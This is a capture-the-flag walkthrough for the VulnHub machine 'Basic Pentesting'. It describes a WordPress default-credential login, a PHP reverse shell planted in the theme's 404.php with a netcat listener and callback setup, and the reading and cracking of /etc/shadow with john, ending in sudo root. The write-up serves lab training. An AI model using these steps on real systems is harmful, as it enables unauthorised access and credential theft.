Basic-Pentesting{VulnHub}

Gladi_47
3 min read · May 13, 2023


Site = VULNHUB
Creator = Josiah Pierce
Diff = 🍕

Basic Summary:
Fairly basic machine, nothing too complicated. Port scanning shows three open ports: FTP, SSH and HTTP. The web server hosts a WordPress site, and the default credentials get us into the admin panel. From there, turning the theme's 404.php template into a PHP reverse shell gives us a shell on the box. The system has a user, marlinspike, and the web shell user can read both /etc/passwd and /etc/shadow. Unshadowing the two files and handing the result to john recovers the password, which logs us in over SSH. The user has full sudo, so... we are root.

## Quick Links

  1. Recon
  2. Web
  3. Initial Access
  4. BruteForce
  5. MarlinSpike
  6. R00T

## RECON

```
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256  f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256  12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:94:1B:57 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

## WEB

If the page loads without CSS, map the target's IP to the hostname the site links to in your /etc/hosts file. It's a WordPress site, so let's log in, trying basic credentials first.

admin:admin works. Well, we're in.

Nothing else of interest in the dashboard, so let's get a reverse shell through the theme editor: replace the contents of the active theme's 404.php with a PHP reverse shell, start a listener, and request the 404 page.


https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
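Before pasting the pentestmonkey shell into 404.php, its two "CHANGE THIS" lines have to point at your listener; leaving them at 127.0.0.1:1234 makes the shell call back to the target itself and fail silently. The snippet below is an added example, not part of the original write-up or the pentestmonkey project: it rewrites those two lines in a copy and verifies the result. The callback address 10.0.0.5:4444 and the theme name are assumptions, and the stand-in file it edits is constructed to carry only the two lines of interest, not the real shell.

```shell
#!/bin/sh
# Added example: point php-reverse-shell.php at our listener and verify the edit.
# LHOST/LPORT and the theme name are assumptions for illustration only.

# set_callback SRC DST LHOST LPORT
# pentestmonkey's shell has the lines "$ip = '127.0.0.1';" and "$port = 1234;".
# Rewrite them into a copy (DST) so the downloaded original stays untouched.
set_callback() {
    src="$1"; dst="$2"; lhost="$3"; lport="$4"
    sed -e "s/^[$]ip = '[0-9.]*';/\$ip = '$lhost';/" \
        -e "s/^[$]port = [0-9]*;/\$port = $lport;/" "$src" > "$dst"
}

# callback_ok FILE LHOST LPORT -> exit 0 only if both values are exactly as expected.
callback_ok() {
    grep -q "^[$]ip = '$2';" "$1" && grep -q "^[$]port = $3;" "$1"
}

# Constructed stand-in (not the real shell): just the two lines that matter.
stub="$(mktemp)"
printf '%s\n' '<?php' \
              "\$ip = '127.0.0.1';  // CHANGE THIS" \
              "\$port = 1234;       // CHANGE THIS" > "$stub"

set_callback "$stub" "$stub.out" 10.0.0.5 4444
callback_ok "$stub.out" 10.0.0.5 4444 && echo "callback set to 10.0.0.5:4444"

# On the attacking box, start the listener first:   nc -lvnp 4444
# Then paste "$stub.out" into Appearance > Theme Editor > 404.php and trigger it
# (theme name is an assumption):  curl http://TARGET/wp-content/themes/<theme>/404.php
```

The check matters because the shell gives no feedback on the attacker's side when the address is wrong; the only symptom is a listener that never connects.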

## Initial Access

Nothing really interesting on the box except that ProFTPD 1.3.3c is running, a version with a well-known backdoor. I want to do this without it, though, so let's check which files we have permission to read.

Both /etc/passwd and /etc/shadow turn out to be readable. Let's unshadow them and try to crack the hash. It's a CTF machine, after all; how hard can it be?

## Bruteforcing the shadow and passwd file

Not hard at all, it turns out: the username is the password.
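The two steps above, checking that /etc/shadow is readable by everyone and merging it with /etc/passwd, are worth seeing in full. The script below is an added example, not from the original write-up: it confirms the world-readable bit, reproduces what the unshadow tool does with a few lines of awk, and then names the john invocations that would crack the result. The passwd and shadow lines are constructed sample data, and the hash is a dummy placeholder rather than a real crypt(3) value.

```shell
#!/bin/sh
# Added example: confirm the /etc/shadow misconfiguration, then build the merged
# file john expects. Sample data below is constructed, not captured from the box.

# world_readable FILE -> exit 0 if the "other" read bit is set.
# Position 8 of the ls -l mode string is that bit ("-rw-r--r--" -> 'r').
# A sane system shows /etc/shadow as -rw-r----- (640) or ---------- (000).
world_readable() {
    [ "$(ls -ld "$1" | cut -c8)" = "r" ]
}

# unshadow_files PASSWD SHADOW -> passwd lines with the hash from shadow in
# field 2, which is what john's crypt formats read (same output as unshadow).
unshadow_files() {
    awk -F: 'NR == FNR { hash[$1] = $2; next }   # first file: shadow, remember hashes
             ($1 in hash) { $2 = hash[$1] }      # second file: passwd, swap in the hash
             { print }' OFS=: "$2" "$1"
}

# Constructed passwd/shadow pair; "$6$constructed$dummyhash" is a placeholder.
work="$(mktemp -d)"
printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
              'marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash' > "$work/passwd"
printf '%s\n' 'root:*:17700:0:99999:7:::' \
              'marlinspike:$6$constructed$dummyhash:17700:0:99999:7:::' > "$work/shadow"
chmod 644 "$work/shadow"    # mimic the misconfiguration found on the box

if world_readable "$work/shadow"; then
    echo "shadow is world-readable, unshadowing"
    unshadow_files "$work/passwd" "$work/shadow" > "$work/hashes"
fi

# On the real box, with the merged file in hand:
#   john --single "$work/hashes"     # login-derived guesses; catches user == password at once
#   john --wordlist=/usr/share/wordlists/rockyou.txt "$work/hashes"
```

Single-crack mode is the right first move here because it builds candidates from the login name and GECOS fields, which is exactly the weakness this box has.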

## SSH as MarlinSpike

Logged in over SSH as marlinspike. Checking for a privilege-escalation path: sudo -l shows the user has sudo rights.

## R00T

Boom, done!

Thanks for reading folks
Happy Hacking 😈 👏

Always eager to hear suggestions for improvement!
